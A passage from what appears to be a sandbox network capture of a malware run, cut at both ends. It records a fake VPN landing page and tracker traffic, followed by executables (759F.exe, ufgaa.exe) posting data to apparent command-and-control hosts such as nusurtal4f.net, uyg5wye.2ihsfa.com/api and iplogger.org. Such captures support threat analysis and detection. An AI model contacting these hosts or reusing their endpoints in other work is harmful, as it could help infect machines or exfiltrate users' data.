                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=MYJmJUCr4Tf98sg0ZERcv5xpa2XLx%2BxHDN3GZ7cpeHaREiJhHQJ6Z%2FuMlBskVqkt2MUJWtE2bHobmGpBqaZ%2BhtwS3HnHHswNzN%2BAA0dqZ4nVltLAHr6OK3vXMVC%2F"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d85fc420125-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/gbox-lp/top.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/gbox-lp/top.png HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:13:00 GMT
                                                                                          content-type: image/png
                                                                                          content-length: 2394
                                                                                          last-modified: Thu, 08 Jul 2021 13:22:03 GMT
                                                                                          etag: "60e6fbfb-95a"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 5754
                                                                                          accept-ranges: bytes
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=9%2BpIlGUTBV8VsKTn4iK3gNT5jdhFc4zo%2BwCk2jgQR2%2F%2Bh2fYfSeF22xVRla6pU9Oz2I%2B3VbrLynKTdLUBifbzBmEyNTlmf%2B2jzwBOLcDRqBYP5Nj0LTQMelN9o3A"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d875dd30125-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/gbox-lp/mid.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/gbox-lp/mid.png HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:13:00 GMT
                                                                                          content-type: image/png
                                                                                          content-length: 989
                                                                                          last-modified: Thu, 08 Jul 2021 11:54:40 GMT
                                                                                          etag: "60e6e780-3dd"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 5754
                                                                                          accept-ranges: bytes
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=BEw8NMMcOiVxNrWNZo8ZcjfAxIUCHitOSLcAqeogu92zeZEeD2BEorIrUqUUOzm8nmG48D%2Fck8cFaAzASHHRtKyWxhU%2Bvh%2FyWOFGaxiJpi2AIg%2FNSQZHleeXATfa"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d878dfd0125-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/gbox-lp/bottom.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/gbox-lp/bottom.png HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:13:00 GMT
                                                                                          content-type: image/png
                                                                                          content-length: 2133
                                                                                          last-modified: Thu, 08 Jul 2021 11:54:40 GMT
                                                                                          etag: "60e6e780-855"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 5754
                                                                                          accept-ranges: bytes
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=mwDltItUYNWAEd4lm8GM4pdMH9ftMNkp3ErxblVD2zXveY484PymgsYmei%2BMYeXJwYp4tmEZ208O8bnGjqs7hWKTvJMoyD2ygWvDg4MdxQwvINzvkQObk6CJun7x"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d878e020125-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/assist/lp-download-ie.png
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/assist/lp-download-ie.png HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:13:00 GMT
                                                                                          content-type: image/png
                                                                                          content-length: 72792
                                                                                          last-modified: Thu, 24 Jun 2021 20:01:09 GMT
                                                                                          etag: "60d4e485-11c58"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 4295
                                                                                          accept-ranges: bytes
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=N5iHxzHZVHXy8B76yYtpkMw54xDjbi7nux7wCfliKTu8xJbAhR92OrhVRShBxLiTEvvYTJRAAl7MsonJudZIz2pVVRx5qawmOyhrl9t0trWbKw59Amd7pjxLh6rE"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d87ae260125-AMS
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          cdnjs.cloudflare.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          cdnjs.cloudflare.com
                                                                                          IN A
                                                                                          Response
                                                                                          cdnjs.cloudflare.com
                                                                                          IN A
                                                                                          104.16.18.94
                                                                                          cdnjs.cloudflare.com
                                                                                          IN A
                                                                                          104.16.19.94
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          cdnjs.cloudflare.com
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          cdnjs.cloudflare.com
                                                                                          IN A
                                                                                          Response
                                                                                          cdnjs.cloudflare.com
                                                                                          IN A
                                                                                          104.16.18.94
                                                                                          cdnjs.cloudflare.com
                                                                                          IN A
                                                                                          104.16.19.94
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://cdnjs.cloudflare.com/ajax/libs/jqueryui/1.10.2/jquery-ui.min.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.16.18.94:443
                                                                                          Request
                                                                                          GET /ajax/libs/jqueryui/1.10.2/jquery-ui.min.js HTTP/2.0
                                                                                          host: cdnjs.cloudflare.com
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: application/javascript; charset=utf-8
                                                                                          content-length: 51522
                                                                                          access-control-allow-origin: *
                                                                                          cache-control: public, max-age=30672000
                                                                                          content-encoding: br
                                                                                          etag: "5eb03ec4-37ade"
                                                                                          last-modified: Mon, 04 May 2020 16:11:48 GMT
                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                          cross-origin-resource-policy: cross-origin
                                                                                          timing-allow-origin: *
                                                                                          x-content-type-options: nosniff
                                                                                          cf-request-id: 0abd8b2b7600002e448a22f000000001
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          vary: Accept-Encoding
                                                                                          cf-cache-status: HIT
                                                                                          age: 1905892
                                                                                          expires: Wed, 29 Jun 2022 23:12:59 GMT
                                                                                          accept-ranges: bytes
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=CIKEOeh%2FRZB4AobP0b6wFbtjyFFZ%2F%2F0OjdPpOIsVp5fSlS%2FnxqYQMMUOmIcMHBNeO%2F1uqfOAvfA35%2BRtGID50tRewM%2Bi%2Fc%2Bv1DPok46A%2F4ixOGwy7FSViGe9mE%2Fk2MU%2Fyg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          strict-transport-security: max-age=15780000
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d85ec192e3e-BRU
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://cdnjs.cloudflare.com/ajax/libs/jquery/1.11.1/jquery.min.js
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          104.16.18.94:443
                                                                                          Request
                                                                                          GET /ajax/libs/jquery/1.11.1/jquery.min.js HTTP/2.0
                                                                                          host: cdnjs.cloudflare.com
                                                                                          accept: application/javascript, */*;q=0.8
                                                                                          referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          accept-language: en-US
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:12:59 GMT
                                                                                          content-type: application/javascript; charset=utf-8
                                                                                          content-length: 29910
                                                                                          access-control-allow-origin: *
                                                                                          cache-control: public, max-age=30672000
                                                                                          content-encoding: br
                                                                                          etag: "5eb03ec4-1762a"
                                                                                          last-modified: Mon, 04 May 2020 16:11:48 GMT
                                                                                          cf-cdnjs-via: cfworker/kv
                                                                                          cross-origin-resource-policy: cross-origin
                                                                                          timing-allow-origin: *
                                                                                          x-content-type-options: nosniff
                                                                                          cf-request-id: 0a7515e36b0000f9619281a000000001
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          vary: Accept-Encoding
                                                                                          cf-cache-status: HIT
                                                                                          age: 3121538
                                                                                          expires: Wed, 29 Jun 2022 23:12:59 GMT
                                                                                          accept-ranges: bytes
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=9J3riQ5kN%2B1ejnogdn10sqonUR%2FgrgYaPfK9Pe%2BAARoKt0v3%2FyxfU9SZoU5pwGKR4U9%2B8OaXhQlp0LVFC9nNLtWJBFLj%2FdO91NXkh2kRC8uA5zq%2BGzBQX6Nt1oQDuOFdOQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          strict-transport-security: max-age=15780000
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d85ec1b2e3e-BRU
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          track.xdisctracking.pw
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          track.xdisctracking.pw
                                                                                          IN A
                                                                                          Response
                                                                                          track.xdisctracking.pw
                                                                                          IN CNAME
                                                                                          toutory-loormself.com
                                                                                          toutory-loormself.com
                                                                                          IN A
                                                                                          34.230.220.28
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://track.xdisctracking.pw/impression/0c4a809a-fe91-45d9-9cbb-56283b83c79a?SubID=null&ClickID=186205267&KW202=PA_POP_1851483
                                                                                          MicrosoftEdgeCP.exe
                                                                                          Remote address:
                                                                                          34.230.220.28:443
                                                                                          Request
                                                                                          GET /impression/0c4a809a-fe91-45d9-9cbb-56283b83c79a?SubID=null&ClickID=186205267&KW202=PA_POP_1851483 HTTP/1.1
                                                                                          Accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
                                                                                          Referer: https://www.freevpn.win/lps/gbox-lp/index.html?cid=186205267&kw=PA_POP_1851483
                                                                                          Accept-Language: en-US
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                          Host: track.xdisctracking.pw
                                                                                          Connection: Keep-Alive
                                                                                          Response
                                                                                          HTTP/1.1 204
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:13:00 GMT
                                                                                          Connection: keep-alive
                                                                                          Cache-Control: no-store, no-cache, pre-check=0, post-check=0
                                                                                          Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                          Pragma: no-cache
                                                                                          Set-Cookie: 0c4a809a-fe91-45d9-9cbb-56283b83c79a-osz-v4=0Z32fhTVKUehRin3HN5I3GSe6sFy_jLQ7VNUN6dhoQoPolQvxGGBb_78puCe7XFeeeOnM2Nq6zgGntPOO2Vw96dL4yMRVpiBzGPfV7WxL2tv_E1B7TAHhZ21y6yn0-B25u-LgEG2OnJQJAqqr4T3LZzIWxkubzZaV16Tqw_QcmhvUPvtoYdKQomqLg3v7Qlb_r8GY1B35gE1iVdKDftSe-N5_f3iaTw4MQoRh8Q67Y-zUJ3P-apu2eEbZ3Vf4RiEUoT79l4W5XMcyZLiqTWcnl8HBC_0qc7Ymr2V45-jNyVPQxjeB_VBZQRefCeXFgUM0NFwqowX_oex284zlO6qr6KZTi3kdeiNyPM2qH3v3aO2tEfzNI4mRmgIVxJKNp1SG-uD2J7_7BYGx6OPyHBC3qARSTIjSuSs4gYFm0uuBcE; Domain=track.xdisctracking.pw; Path=/; Secure; HttpOnly;SameSite=None
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/lps/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /lps/favicon.ico HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: */*
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          dnt: 1
                                                                                          Response
                                                                                          HTTP/2.0 404
                                                                                          date: Fri, 09 Jul 2021 23:13:00 GMT
                                                                                          content-type: text/html
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 33
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=icADIkn%2BZjecILL86f%2BIMdjGIFWdYjqfuIdNTew8xsmTML3oiGANyQPW%2FfvwymkYc9t8iCfSQMp%2FvIPr%2BLfMeh0598aOsxnzgj2zPo2KSMVbsjwQrJqnvj62oCF5"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d89cb11fa8c-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.freevpn.win/favicon.ico
                                                                                          MicrosoftEdge.exe
                                                                                          Remote address:
                                                                                          172.67.185.200:443
                                                                                          Request
                                                                                          GET /favicon.ico HTTP/2.0
                                                                                          host: www.freevpn.win
                                                                                          accept: */*
                                                                                          accept-encoding: gzip, deflate, br
                                                                                          user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
                                                                                          dnt: 1
                                                                                          Response
                                                                                          HTTP/2.0 200
                                                                                          date: Fri, 09 Jul 2021 23:13:00 GMT
                                                                                          content-type: image/x-icon
                                                                                          last-modified: Mon, 08 Feb 2021 17:24:50 GMT
                                                                                          etag: W/"602173e2-3c2e"
                                                                                          cache-control: max-age=14400
                                                                                          cf-cache-status: HIT
                                                                                          age: 58
                                                                                          expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                          report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=yyqmGkb0gHoGpqlS%2Bjx95KUKjsEqTnYZDm6mlIxj5oW74MUBRwohgiUyVMApVLohapGdIgioSe08hJgJWLH%2FpTfoWvhUnN3%2FKCkCzDc9nnyf9CW64ZcKWX1t%2BhWY"}],"group":"cf-nel","max_age":604800}
                                                                                          nel: {"report_to":"cf-nel","max_age":604800}
                                                                                          vary: Accept-Encoding
                                                                                          server: cloudflare
                                                                                          cf-ray: 66c53d8a0b4dfa8c-AMS
                                                                                          content-encoding: br
                                                                                          alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.instagram.com
                                                                                          svchost.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.instagram.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.instagram.com
                                                                                          IN CNAME
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          z-p42-instagram.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.174
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          nusurtal4f.net
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          nusurtal4f.net
                                                                                          IN A
                                                                                          Response
                                                                                          nusurtal4f.net
                                                                                          IN A
                                                                                          5.61.43.76
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://nusurtal4f.net/
                                                                                          Remote address:
                                                                                          5.61.43.76:80
                                                                                          Request
                                                                                          POST / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://nusurtal4f.net/
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Length: 227
                                                                                          Host: nusurtal4f.net
                                                                                          Response
                                                                                          HTTP/1.1 404 Not Found
                                                                                          Server: nginx/1.20.0
                                                                                          Date: Fri, 09 Jul 2021 23:13:43 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Content-Length: 7
                                                                                          Connection: keep-alive
                                                                                          X-Powered-By: PHP/5.6.40
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          tttttt.me
                                                                                          759F.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          Response
                                                                                          tttttt.me
                                                                                          IN A
                                                                                          54.197.173.238
                                                                                        • flag-unknown
                                                                                          DNS
                                                                                          www.facebook.com
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          8.8.8.8:53
                                                                                          Request
                                                                                          www.facebook.com
                                                                                          IN A
                                                                                          Response
                                                                                          www.facebook.com
                                                                                          IN CNAME
                                                                                          star-mini.c10r.facebook.com
                                                                                          star-mini.c10r.facebook.com
                                                                                          IN A
                                                                                          31.13.83.36
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://www.facebook.com/
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          31.13.83.36:443
                                                                                          Request
                                                                                          GET / HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          viewport-width: 1920
                                                                                          Sec-Fetch-Dest: document
                                                                                          Sec-Fetch-Mode: navigate
                                                                                          Sec-Fetch-Site: none
                                                                                          Sec-Fetch-User: ?1
                                                                                          Upgrade-Insecure-Requests: 1
                                                                                          Host: www.facebook.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Vary: Accept-Encoding
                                                                                          x-fb-rlafr: 0
                                                                                          Pragma: no-cache
                                                                                          Cache-Control: private, no-cache, no-store, must-revalidate
                                                                                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-XSS-Protection: 0
                                                                                          content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                                                                                          X-Frame-Options: DENY
                                                                                          Strict-Transport-Security: max-age=15552000; preload
                                                                                          Content-Type: text/html; charset="utf-8"
                                                                                          X-FB-Debug: nv6LdKbwR+evYeCInmSQzMoI9JBHL3LgHA+KixBaOw/tRdi9LVnPFxvQg716v/OQSKE6A3QNOZPLSdfxv5sXJg==
                                                                                          Date: Fri, 09 Jul 2021 23:15:06 GMT
                                                                                          Priority: u=3,i
                                                                                          Transfer-Encoding: chunked
                                                                                          Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
                                                                                          Connection: keep-alive
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          http://uyg5wye.2ihsfa.com/api/fbtime
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          88.218.92.148:80
                                                                                          Request
                                                                                          GET /api/fbtime HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          Host: uyg5wye.2ihsfa.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:15:07 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          X-Powered-By: PHP/7.3.21
                                                                                        • flag-unknown
                                                                                          POST
                                                                                          http://uyg5wye.2ihsfa.com/api/?sid=72869&key=d871ff8abd9a60f9f0fd16913295de1e
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          88.218.92.148:80
                                                                                          Request
                                                                                          POST /api/?sid=72869&key=d871ff8abd9a60f9f0fd16913295de1e HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          Content-Length: 266
                                                                                          Host: uyg5wye.2ihsfa.com
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Fri, 09 Jul 2021 23:15:08 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          X-Powered-By: PHP/7.3.21
                                                                                        • flag-unknown
                                                                                          GET
                                                                                          https://iplogger.org/18hh57
                                                                                          ufgaa.exe
                                                                                          Remote address:
                                                                                          88.99.66.31:443
                                                                                          Request
                                                                                          GET /18hh57 HTTP/1.1
                                                                                          Connection: Keep-Alive
                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                                                                                          viewport-width: 1920
                                                                                          Host: iplogger.org
                                                                                          Response
                                                                                          HTTP/1.1 200 OK
                                                                                          Server: nginx
